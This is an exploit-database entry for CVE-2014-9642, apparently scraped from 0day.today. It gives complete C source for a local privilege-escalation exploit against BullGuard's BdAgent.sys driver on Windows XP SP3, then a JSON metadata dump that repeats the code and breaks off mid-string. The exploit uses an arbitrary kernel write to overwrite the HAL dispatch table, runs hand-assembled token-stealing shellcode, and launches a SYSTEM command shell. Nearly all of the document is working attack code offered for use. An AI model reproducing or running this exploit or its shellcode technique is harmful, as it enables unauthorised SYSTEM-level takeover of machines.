ID 1337DAY-ID-23244
Type zdt
Reporter Parvez Anwar
Modified 2015-02-04T00:00:00
Description
Exploit for windows platform in category local exploits
/*
Exploit Title - BullGuard Multiple Products Arbitrary Write Privilege Escalation
Date - 04th February 2015
Discovered by - Parvez Anwar (@parvezghh)
Vendor Homepage - http://www.bullguard.com/
Tested Version - 14.1.285.4
Driver Version - 1.0.0.6 - BdAgent.sys
Tested on OS - 32bit Windows XP SP3
OSVDB - http://www.osvdb.org/show/osvdb/114478
CVE ID - CVE-2014-9642
Vendor fix url - http://www.bullguard.com/about/release-notes.aspx
Fixed Version - 15.0.288.1
Fixed driver ver - 1.0.0.7
Note
----
Overwritten HAL dispatch table after exploit
kd> dps nt!HalDispatchTable l c
8054ccb8 00000003
8054ccbc 00340000
8054ccc0 00010000
8054ccc4 0a060002
8054ccc8 ee657645
8054cccc 00000001
8054ccd0 00000001
8054ccd4 867c1bf0
8054ccd8 80613f7b nt!IoSetPartitionInformation
8054ccdc 806141ef nt!IoWritePartitionTable
8054cce0 8052d157 nt!CcHasInactiveViews
8054cce4 804e42d1 nt!ObpTraceDepth+0x19
7 pointers get overwritten. Since input buffer is in our control and pointers
are static in XP I've triggered the overwrite again restoring the pointers.
*/
#include <stdio.h>
#include <windows.h>
#define BUFSIZE 4096
typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
PVOID Unknown1;
PVOID Unknown2;
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT PathLength;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct _SYSTEM_MODULE_INFORMATION {
ULONG Count;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemModuleInformation = 11,
SystemHandleInformation = 16
} SYSTEM_INFORMATION_CLASS;
typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)(
SYSTEM_INFORMATION_CLASS SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength);
typedef NTSTATUS (WINAPI *_NtQueryIntervalProfile)(
DWORD ProfileSource,
PULONG Interval);
typedef void (*FUNCTPTR)();
// Windows XP SP3
#define XP_KPROCESS 0x44 // Offset to _KPROCESS from a _ETHREAD struct
#define XP_TOKEN 0xc8 // Offset to TOKEN from the _EPROCESS struct
#define XP_UPID 0x84 // Offset to UniqueProcessId FROM the _EPROCESS struct
#define XP_APLINKS 0x88 // Offset to ActiveProcessLinks _EPROCESS struct
BYTE token_steal_xp[] =
{
0x52, // push edx Save edx on the stack
0x53, // push ebx Save ebx on the stack
0x33,0xc0, // xor eax, eax eax = 0
0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD
0x8b,0x40,XP_KPROCESS, // mov eax, [eax+XP_KPROCESS] Retrieve _KPROCESS
0x8b,0xc8, // mov ecx, eax
0x8b,0x98,XP_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+XP_TOKEN] Retrieves TOKEN
0x8b,0x80,XP_APLINKS,0x00,0x00,0x00, // mov eax, [eax+XP_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks
0x81,0xe8,XP_APLINKS,0x00,0x00,0x00, // sub eax, XP_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks
0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+XP_UPID], 4 | Compares UniqueProcessId with 4 (System Process)
0x75,0xe8, // jne ----
0x8b,0x90,XP_TOKEN,0x00,0x00,0x00, // mov edx, [eax+XP_TOKEN] Retrieves TOKEN and stores on EDX
0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX
0x89,0x90,XP_TOKEN,0x00,0x00,0x00, // mov [eax+XP_TOKEN], edx Overwrites the TOKEN for the current KPROCESS
0x5b, // pop ebx Restores ebx
0x5a, // pop edx Restores edx
0xc2,0x08 // ret 8 Away from the kernel
};
BYTE restore_pointers_xp[] = // kd> dps nt!HalDispatchTable
"\xf2\xa3\x6f\x80" // 8054ccbc 806fa3f2 hal!HaliQuerySystemInformation
"\xce\xa3\x6f\x80" // 8054ccc0 806fa3ce hal!HaliSetSystemInformation
"\x0b\x46\x61\x80" // 8054ccc4 8061460b nt!xHalQueryBusSlots
"\x00\x00\x00\x00" // 8054ccc8 00000000
"\x4d\xac\x50\x80" // 8054cccc 8050ac4d nt!HalExamineMBR
"\x89\x6f\x5c\x80" // 8054ccd0 805c6f89 nt!IoAssignDriveLetters
"\xe5\x4a\x5c\x80"; // 8054ccd4 805c4ae5 nt!IoReadPartitionTable
DWORD HalDispatchTableAddress()
{
_NtQuerySystemInformation NtQuerySystemInformation;
PSYSTEM_MODULE_INFORMATION pModuleInfo;
DWORD HalDispatchTable;
CHAR kFullName[256];
PVOID kBase = NULL;
LPSTR kName;
HMODULE Kernel;
FUNCTPTR Hal;
ULONG len;
NTSTATUS status;
NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");
if (!NtQuerySystemInformation)
{
printf("[-] Unable to resolve NtQuerySystemInformation\n\n");
return -1;
}
status = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);
if (!status)
{
printf("[-] An error occured while reading NtQuerySystemInformation. Status = 0x%08x\n\n", status);
return -1;
}
pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len);
if(pModuleInfo == NULL)
{
printf("[-] An error occurred with GlobalAlloc for pModuleInfo\n\n");
return -1;
}
status = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len);
memset(kFullName, 0x00, sizeof(kFullName));
strcpy_s(kFullName, sizeof(kFullName)-1, pModuleInfo->Module[0].ImageName);
kBase = pModuleInfo->Module[0].Base;
printf("[i] Kernel base name %s\n", kFullName);
kName = strrchr(kFullName, '\\');
Kernel = LoadLibraryA(++kName);
if(Kernel == NULL)
{
printf("[-] Failed to load kernel base\n\n");
return -1;
}
Hal = (FUNCTPTR)GetProcAddress(Kernel, "HalDispatchTable");
if(Hal == NULL)
{
printf("[-] Failed to find HalDispatchTable\n\n");
return -1;
}
printf("[i] HalDispatchTable address 0x%08x\n", Hal);
printf("[i] Kernel handle 0x%08x\n", Kernel);
printf("[i] Kernel base address 0x%08x\n", kBase);
HalDispatchTable = ((DWORD)Hal - (DWORD)Kernel + (DWORD)kBase);
printf("[+] Kernel address of HalDispatchTable 0x%08x\n", HalDispatchTable);
if(!HalDispatchTable)
{
printf("[-] Failed to calculate HalDispatchTable\n\n");
return -1;
}
return HalDispatchTable;
}
int GetWindowsVersion()
{
int v = 0;
DWORD version = 0, minVersion = 0, majVersion = 0;
version = GetVersion();
minVersion = (DWORD)(HIBYTE(LOWORD(version)));
majVersion = (DWORD)(LOBYTE(LOWORD(version)));
if (minVersion == 1 && majVersion == 5) v = 1; // "Windows XP;
if (minVersion == 1 && majVersion == 6) v = 2; // "Windows 7";
if (minVersion == 2 && majVersion == 5) v = 3; // "Windows Server 2003;
return v;
}
void spawnShell()
{
STARTUPINFOA si;
PROCESS_INFORMATION pi;
ZeroMemory(&pi, sizeof(pi));
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
si.cb = sizeof(si);
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_SHOWNORMAL;
if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
{
printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError());
return;
}
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}
int main(int argc, char *argv[])
{
_NtQueryIntervalProfile NtQueryIntervalProfile;
LPVOID input[1] = {0};
LPVOID addrtoshell;
HANDLE hDevice;
DWORD dwRetBytes = 0;
DWORD HalDispatchTableTarget;
ULONG time = 0;
unsigned char devhandle[MAX_PATH];
printf("-------------------------------------------------------------------------------\n");
printf(" BullGuard Multiple Products (bdagent.sys) Arbitrary Write EoP Exploit \n");
printf(" Tested on Windows XP SP3 (32bit) \n");
printf("-------------------------------------------------------------------------------\n\n");
if (GetWindowsVersion() == 1)
{
printf("[i] Running Windows XP\n");
}
if (GetWindowsVersion() == 0)
{
printf("[i] Exploit not supported on this OS\n\n");
return -1;
}
sprintf(devhandle, "\\\\.\\%s", "bdagent");
NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile");
if (!NtQueryIntervalProfile)
{
printf("[-] Unable to resolve NtQueryIntervalProfile\n\n");
return -1;
}
addrtoshell = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if(addrtoshell == NULL)
{
printf("[-] VirtualAlloc allocation failure %.8x\n\n", GetLastError());
return -1;
}
printf("[+] VirtualAlloc allocated memory at 0x%.8x\n", addrtoshell);
memset(addrtoshell, 0x90, BUFSIZE);
memcpy(addrtoshell, token_steal_xp, sizeof(token_steal_xp));
printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp));
hDevice = CreateFile(devhandle, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
if (hDevice == INVALID_HANDLE_VALUE)
{
printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError());
return -1;
}
else
{
printf("[+] Open %s device successful\n", devhandle);
}
HalDispatchTableTarget = HalDispatchTableAddress() + sizeof(DWORD);
printf("[+] HalDispatchTable+4 (0x%08x) will be overwritten\n", HalDispatchTableTarget);
input[0] = addrtoshell; // input buffer contents gets written to our output buffer address
printf("[+] Input buffer contents %08x\n", input[0]);
printf("[~] Press any key to send Exploit . . .\n");
getch();
DeviceIoControl(hDevice, 0x0022405c, input, sizeof(input), (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL);
printf("[+] Buffer sent\n");
printf("[+] Spawning SYSTEM Shell\n");
NtQueryIntervalProfile(2, &time);
spawnShell();
printf("[+] Restoring Hal dispatch table pointers\n\n");
DeviceIoControl(hDevice, 0x0022405c, restore_pointers_xp, sizeof(restore_pointers_xp)-1, (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL);
CloseHandle(hDevice);
return 0;
}
# 0day.today [2018-04-09] #
{"hash": "7863999dddd763596b1deb5a02748f622c400d30c07bb594bb3b7cccb4197e68", "id": "1337DAY-ID-23244", "lastseen": "2018-04-09T11:43:25", "viewCount": 5, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "4ffb5f5e7f9ccfd1a9eacae5d70ad7d7", "key": "cvelist"}, {"hash": "cfd16da9581e0c21db590e40dfd9e493", "key": "cvss"}, {"hash": "3aa73750dff5f1c896c4435c28429fd5", "key": "description"}, {"hash": "3b5771a804d42ec938f266a942f26708", "key": "href"}, {"hash": "a5d3a6718243c1391c2be3624863e0b1", "key": "modified"}, {"hash": "a5d3a6718243c1391c2be3624863e0b1", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "9064a63f9c253226ca4a087ef119b002", "key": "reporter"}, {"hash": "61cd7295c8570a2b711f5e8d287912f4", "key": "sourceData"}, {"hash": "a73a8b6eefe15629f489d09ea96bea1d", "key": "sourceHref"}, {"hash": "cde7a17cc4b61e8629cb9fd64a69fc05", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "edition": 2, "enchantments": {"score": {"value": 7.2, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-9642"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:130247"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805277", "OPENVAS:1361412562310805278", "OPENVAS:1361412562310805275", "OPENVAS:1361412562310805276"]}, {"type": "exploitdb", "idList": ["EDB-ID:35994"]}], "modified": "2018-04-09T11:43:25"}, "vulnersScore": 7.2}, "type": "zdt", "sourceHref": "https://0day.today/exploit/23244", "description": "Exploit for windows platform in category local exploits", "title": "BullGuard Multiple Products Arbitrary Write Privilege Escalation Exploit", "history": [{"bulletin": {"hash": "c8750e843247a616ea6d39398366840e186a91f4339119e08d97044b237f4d8d", "id": "1337DAY-ID-23244", "lastseen": "2016-04-20T00:27:56", "enchantments": {"score": {"value": 4.3, "vector": "AV:N/AC:M/Au:M/C:P/I:P/A:N/", "modified": "2016-04-20T00:27:56"}}, "hashmap": [{"hash": "4ffb5f5e7f9ccfd1a9eacae5d70ad7d7", "key": "cvelist"}, {"hash": "cbf03eddf9535b15f1cde6bc36a3526a", "key": "href"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "99dfb8090fd1d6370b77bf036ddfe04d", "key": "sourceHref"}, {"hash": "cde7a17cc4b61e8629cb9fd64a69fc05", "key": "title"}, {"hash": "cfd16da9581e0c21db590e40dfd9e493", "key": "cvss"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "6f2012bf0f5b554e9d4df9c2e810782a", "key": "sourceData"}, {"hash": "a5d3a6718243c1391c2be3624863e0b1", "key": "modified"}, {"hash": "3aa73750dff5f1c896c4435c28429fd5", "key": "description"}, {"hash": "a5d3a6718243c1391c2be3624863e0b1", "key": "published"}, {"hash": "9064a63f9c253226ca4a087ef119b002", "key": "reporter"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/23244", "description": "Exploit for windows platform in category local exploits", "viewCount": 0, "title": "BullGuard Multiple Products Arbitrary Write Privilege Escalation Exploit", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "objectVersion": "1.0", "cvelist": ["CVE-2014-9642"], "sourceData": "/*\r\n \r\nExploit Title - BullGuard Multiple Products Arbitrary Write Privilege Escalation\r\nDate - 04th February 2015\r\nDiscovered by - Parvez Anwar (@parvezghh)\r\nVendor Homepage - http://www.bullguard.com/\r\nTested Version - 14.1.285.4\r\nDriver Version - 1.0.0.6 - BdAgent.sys\r\nTested on OS - 32bit Windows XP SP3\r\nOSVDB - http://www.osvdb.org/show/osvdb/114478\r\nCVE ID - CVE-2014-9642\r\nVendor fix url - http://www.bullguard.com/about/release-notes.aspx\r\nFixed Version - 15.0.288.1\r\nFixed driver ver - 1.0.0.7\r\n \r\n \r\n \r\nNote\r\n----\r\nOverwritten HAL dispatch table after exploit\r\n \r\nkd> dps nt!HalDispatchTable l c\r\n8054ccb8 00000003\r\n8054ccbc 00340000\r\n8054ccc0 00010000\r\n8054ccc4 0a060002\r\n8054ccc8 ee657645\r\n8054cccc 00000001\r\n8054ccd0 00000001\r\n8054ccd4 867c1bf0\r\n8054ccd8 80613f7b nt!IoSetPartitionInformation\r\n8054ccdc 806141ef nt!IoWritePartitionTable\r\n8054cce0 8052d157 nt!CcHasInactiveViews\r\n8054cce4 804e42d1 nt!ObpTraceDepth+0x19\r\n \r\n7 pointers get overwritten. Since input buffer is in our control and pointers\r\nare static in XP I've triggered the overwrite again restoring the pointers.\r\n \r\n*/\r\n \r\n \r\n#include <stdio.h>\r\n#include <windows.h>\r\n \r\n#define BUFSIZE 4096\r\n \r\n \r\ntypedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {\r\n PVOID Unknown1;\r\n PVOID Unknown2;\r\n PVOID Base;\r\n ULONG Size;\r\n ULONG Flags;\r\n USHORT Index;\r\n USHORT NameLength;\r\n USHORT LoadCount;\r\n USHORT PathLength;\r\n CHAR ImageName[256];\r\n} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;\r\n \r\ntypedef struct _SYSTEM_MODULE_INFORMATION {\r\n ULONG Count;\r\n SYSTEM_MODULE_INFORMATION_ENTRY Module[1];\r\n} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;\r\n \r\ntypedef enum _SYSTEM_INFORMATION_CLASS {\r\n SystemModuleInformation = 11,\r\n SystemHandleInformation = 16\r\n} SYSTEM_INFORMATION_CLASS;\r\n \r\ntypedef NTSTATUS (WINAPI *_NtQuerySystemInformation)(\r\n SYSTEM_INFORMATION_CLASS SystemInformationClass,\r\n PVOID SystemInformation,\r\n ULONG SystemInformationLength,\r\n PULONG ReturnLength);\r\n \r\ntypedef NTSTATUS (WINAPI *_NtQueryIntervalProfile)(\r\n DWORD ProfileSource,\r\n PULONG Interval);\r\n \r\ntypedef void (*FUNCTPTR)();\r\n \r\n \r\n \r\n// Windows XP SP3\r\n \r\n#define XP_KPROCESS 0x44 // Offset to _KPROCESS from a _ETHREAD struct\r\n#define XP_TOKEN 0xc8 // Offset to TOKEN from the _EPROCESS struct\r\n#define XP_UPID 0x84 // Offset to UniqueProcessId FROM the _EPROCESS struct\r\n#define XP_APLINKS 0x88 // Offset to ActiveProcessLinks _EPROCESS struct\r\n \r\n \r\nBYTE token_steal_xp[] =\r\n{\r\n 0x52, // push edx Save edx on the stack\r\n 0x53, // push ebx Save ebx on the stack\r\n 0x33,0xc0, // xor eax, eax eax = 0\r\n 0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD\r\n 0x8b,0x40,XP_KPROCESS, // mov eax, [eax+XP_KPROCESS] Retrieve _KPROCESS\r\n 0x8b,0xc8, // mov ecx, eax\r\n 0x8b,0x98,XP_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+XP_TOKEN] Retrieves TOKEN\r\n 0x8b,0x80,XP_APLINKS,0x00,0x00,0x00, // mov eax, [eax+XP_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks\r\n 0x81,0xe8,XP_APLINKS,0x00,0x00,0x00, // sub eax, XP_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks\r\n 0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+XP_UPID], 4 | Compares UniqueProcessId with 4 (System Process)\r\n 0x75,0xe8, // jne ----\r\n 0x8b,0x90,XP_TOKEN,0x00,0x00,0x00, // mov edx, [eax+XP_TOKEN] Retrieves TOKEN and stores on EDX\r\n 0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX\r\n 0x89,0x90,XP_TOKEN,0x00,0x00,0x00, // mov [eax+XP_TOKEN], edx Overwrites the TOKEN for the current KPROCESS\r\n 0x5b, // pop ebx Restores ebx\r\n 0x5a, // pop edx Restores edx\r\n 0xc2,0x08 // ret 8 Away from the kernel \r\n};\r\n \r\n \r\n \r\nBYTE restore_pointers_xp[] = // kd> dps nt!HalDispatchTable\r\n\"\\xf2\\xa3\\x6f\\x80\" // 8054ccbc 806fa3f2 hal!HaliQuerySystemInformation\r\n\"\\xce\\xa3\\x6f\\x80\" // 8054ccc0 806fa3ce hal!HaliSetSystemInformation\r\n\"\\x0b\\x46\\x61\\x80\" // 8054ccc4 8061460b nt!xHalQueryBusSlots\r\n\"\\x00\\x00\\x00\\x00\" // 8054ccc8 00000000\r\n\"\\x4d\\xac\\x50\\x80\" // 8054cccc 8050ac4d nt!HalExamineMBR\r\n\"\\x89\\x6f\\x5c\\x80\" // 8054ccd0 805c6f89 nt!IoAssignDriveLetters\r\n\"\\xe5\\x4a\\x5c\\x80\"; // 8054ccd4 805c4ae5 nt!IoReadPartitionTable\r\n \r\n \r\n \r\nDWORD HalDispatchTableAddress()\r\n{\r\n _NtQuerySystemInformation NtQuerySystemInformation;\r\n PSYSTEM_MODULE_INFORMATION pModuleInfo;\r\n DWORD HalDispatchTable;\r\n CHAR kFullName[256];\r\n PVOID kBase = NULL;\r\n LPSTR kName;\r\n HMODULE Kernel;\r\n FUNCTPTR Hal;\r\n ULONG len;\r\n NTSTATUS status;\r\n \r\n \r\n NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle(\"ntdll.dll\"), \"NtQuerySystemInformation\");\r\n \r\n if (!NtQuerySystemInformation)\r\n {\r\n printf(\"[-] Unable to resolve NtQuerySystemInformation\\n\\n\");\r\n return -1; \r\n }\r\n \r\n status = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);\r\n \r\n if (!status)\r\n {\r\n printf(\"[-] An error occured while reading NtQuerySystemInformation. Status = 0x%08x\\n\\n\", status);\r\n return -1;\r\n }\r\n \r\n pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len);\r\n \r\n if(pModuleInfo == NULL)\r\n {\r\n printf(\"[-] An error occurred with GlobalAlloc for pModuleInfo\\n\\n\");\r\n return -1;\r\n }\r\n \r\n status = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len);\r\n \r\n memset(kFullName, 0x00, sizeof(kFullName));\r\n strcpy_s(kFullName, sizeof(kFullName)-1, pModuleInfo->Module[0].ImageName);\r\n kBase = pModuleInfo->Module[0].Base;\r\n \r\n printf(\"[i] Kernel base name %s\\n\", kFullName);\r\n kName = strrchr(kFullName, '\\\\');\r\n \r\n Kernel = LoadLibraryA(++kName);\r\n \r\n if(Kernel == NULL)\r\n {\r\n printf(\"[-] Failed to load kernel base\\n\\n\");\r\n return -1;\r\n }\r\n \r\n Hal = (FUNCTPTR)GetProcAddress(Kernel, \"HalDispatchTable\");\r\n \r\n if(Hal == NULL)\r\n {\r\n printf(\"[-] Failed to find HalDispatchTable\\n\\n\");\r\n return -1;\r\n }\r\n \r\n printf(\"[i] HalDispatchTable address 0x%08x\\n\", Hal); \r\n printf(\"[i] Kernel handle 0x%08x\\n\", Kernel);\r\n printf(\"[i] Kernel base address 0x%08x\\n\", kBase); \r\n \r\n HalDispatchTable = ((DWORD)Hal - (DWORD)Kernel + (DWORD)kBase);\r\n \r\n printf(\"[+] Kernel address of HalDispatchTable 0x%08x\\n\", HalDispatchTable);\r\n \r\n if(!HalDispatchTable)\r\n {\r\n printf(\"[-] Failed to calculate HalDispatchTable\\n\\n\");\r\n return -1;\r\n }\r\n \r\n return HalDispatchTable;\r\n}\r\n \r\n \r\nint GetWindowsVersion()\r\n{\r\n int v = 0;\r\n DWORD version = 0, minVersion = 0, majVersion = 0;\r\n \r\n version = GetVersion();\r\n \r\n minVersion = (DWORD)(HIBYTE(LOWORD(version)));\r\n majVersion = (DWORD)(LOBYTE(LOWORD(version)));\r\n \r\n if (minVersion == 1 && majVersion == 5) v = 1; // \"Windows XP;\r\n if (minVersion == 1 && majVersion == 6) v = 2; // \"Windows 7\";\r\n if (minVersion == 2 && majVersion == 5) v = 3; // \"Windows Server 2003;\r\n \r\n return v;\r\n}\r\n \r\n \r\nvoid spawnShell()\r\n{\r\n STARTUPINFOA si;\r\n PROCESS_INFORMATION pi;\r\n \r\n \r\n ZeroMemory(&pi, sizeof(pi));\r\n ZeroMemory(&si, sizeof(si));\r\n si.cb = sizeof(si);\r\n \r\n si.cb = sizeof(si);\r\n si.dwFlags = STARTF_USESHOWWINDOW;\r\n si.wShowWindow = SW_SHOWNORMAL;\r\n \r\n if (!CreateProcess(NULL, \"cmd.exe\", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))\r\n {\r\n printf(\"\\n[-] CreateProcess failed (%d)\\n\\n\", GetLastError());\r\n return;\r\n }\r\n \r\n CloseHandle(pi.hThread);\r\n CloseHandle(pi.hProcess);\r\n}\r\n \r\n \r\nint main(int argc, char *argv[])\r\n{\r\n \r\n _NtQueryIntervalProfile NtQueryIntervalProfile;\r\n LPVOID input[1] = {0}; \r\n LPVOID addrtoshell;\r\n HANDLE hDevice;\r\n DWORD dwRetBytes = 0;\r\n DWORD HalDispatchTableTarget; \r\n ULONG time = 0;\r\n unsigned char devhandle[MAX_PATH];\r\n \r\n \r\n printf(\"-------------------------------------------------------------------------------\\n\");\r\n printf(\" BullGuard Multiple Products (bdagent.sys) Arbitrary Write EoP Exploit \\n\");\r\n printf(\" Tested on Windows XP SP3 (32bit) \\n\");\r\n printf(\"-------------------------------------------------------------------------------\\n\\n\");\r\n \r\n if (GetWindowsVersion() == 1)\r\n {\r\n printf(\"[i] Running Windows XP\\n\");\r\n }\r\n \r\n if (GetWindowsVersion() == 0)\r\n {\r\n printf(\"[i] Exploit not supported on this OS\\n\\n\");\r\n return -1;\r\n } \r\n \r\n sprintf(devhandle, \"\\\\\\\\.\\\\%s\", \"bdagent\");\r\n \r\n NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle(\"ntdll.dll\"), \"NtQueryIntervalProfile\");\r\n \r\n if (!NtQueryIntervalProfile)\r\n {\r\n printf(\"[-] Unable to resolve NtQueryIntervalProfile\\n\\n\");\r\n return -1; \r\n }\r\n \r\n addrtoshell = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);\r\n \r\n if(addrtoshell == NULL)\r\n {\r\n printf(\"[-] VirtualAlloc allocation failure %.8x\\n\\n\", GetLastError());\r\n return -1;\r\n }\r\n printf(\"[+] VirtualAlloc allocated memory at 0x%.8x\\n\", addrtoshell);\r\n \r\n memset(addrtoshell, 0x90, BUFSIZE);\r\n memcpy(addrtoshell, token_steal_xp, sizeof(token_steal_xp));\r\n printf(\"[i] Size of shellcode %d bytes\\n\", sizeof(token_steal_xp));\r\n \r\n hDevice = CreateFile(devhandle, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);\r\n \r\n if (hDevice == INVALID_HANDLE_VALUE)\r\n {\r\n printf(\"[-] CreateFile open %s device failed (%d)\\n\\n\", devhandle, GetLastError());\r\n return -1;\r\n }\r\n else\r\n {\r\n printf(\"[+] Open %s device successful\\n\", devhandle);\r\n }\r\n \r\n HalDispatchTableTarget = HalDispatchTableAddress() + sizeof(DWORD);\r\n printf(\"[+] HalDispatchTable+4 (0x%08x) will be overwritten\\n\", HalDispatchTableTarget);\r\n \r\n input[0] = addrtoshell; // input buffer contents gets written to our output buffer address\r\n \r\n printf(\"[+] Input buffer contents %08x\\n\", input[0]);\r\n \r\n printf(\"[~] Press any key to send Exploit . . .\\n\");\r\n getch();\r\n \r\n DeviceIoControl(hDevice, 0x0022405c, input, sizeof(input), (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL);\r\n \r\n printf(\"[+] Buffer sent\\n\");\r\n \r\n printf(\"[+] Spawning SYSTEM Shell\\n\");\r\n NtQueryIntervalProfile(2, &time);\r\n spawnShell();\r\n \r\n printf(\"[+] Restoring Hal dispatch table pointers\\n\\n\");\r\n \r\n DeviceIoControl(hDevice, 0x0022405c, restore_pointers_xp, sizeof(restore_pointers_xp)-1, (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL);\r\n \r\n CloseHandle(hDevice);\r\n \r\n return 0;\r\n}\n\n# 0day.today [2016-04-19] #", "published": "2015-02-04T00:00:00", "references": [], "reporter": "Parvez Anwar", "modified": "2015-02-04T00:00:00", "href": "http://0day.today/exploit/description/23244"}, "lastseen": "2016-04-20T00:27:56", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": ["CVE-2014-9642"], "sourceData": "/*\r\n \r\nExploit Title - BullGuard Multiple Products Arbitrary Write Privilege Escalation\r\nDate - 04th February 2015\r\nDiscovered by - Parvez Anwar (@parvezghh)\r\nVendor Homepage - http://www.bullguard.com/\r\nTested Version - 14.1.285.4\r\nDriver Version - 1.0.0.6 - BdAgent.sys\r\nTested on OS - 32bit Windows XP SP3\r\nOSVDB - http://www.osvdb.org/show/osvdb/114478\r\nCVE ID - CVE-2014-9642\r\nVendor fix url - http://www.bullguard.com/about/release-notes.aspx\r\nFixed Version - 15.0.288.1\r\nFixed driver ver - 1.0.0.7\r\n \r\n \r\n \r\nNote\r\n----\r\nOverwritten HAL dispatch table after exploit\r\n \r\nkd> dps nt!HalDispatchTable l c\r\n8054ccb8 00000003\r\n8054ccbc 00340000\r\n8054ccc0 00010000\r\n8054ccc4 0a060002\r\n8054ccc8 ee657645\r\n8054cccc 00000001\r\n8054ccd0 00000001\r\n8054ccd4 867c1bf0\r\n8054ccd8 80613f7b nt!IoSetPartitionInformation\r\n8054ccdc 806141ef nt!IoWritePartitionTable\r\n8054cce0 8052d157 nt!CcHasInactiveViews\r\n8054cce4 804e42d1 nt!ObpTraceDepth+0x19\r\n \r\n7 pointers get overwritten. Since input buffer is in our control and pointers\r\nare static in XP I've triggered the overwrite again restoring the pointers.\r\n \r\n*/\r\n \r\n \r\n#include <stdio.h>\r\n#include <windows.h>\r\n \r\n#define BUFSIZE 4096\r\n \r\n \r\ntypedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {\r\n PVOID Unknown1;\r\n PVOID Unknown2;\r\n PVOID Base;\r\n ULONG Size;\r\n ULONG Flags;\r\n USHORT Index;\r\n USHORT NameLength;\r\n USHORT LoadCount;\r\n USHORT PathLength;\r\n CHAR ImageName[256];\r\n} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;\r\n \r\ntypedef struct 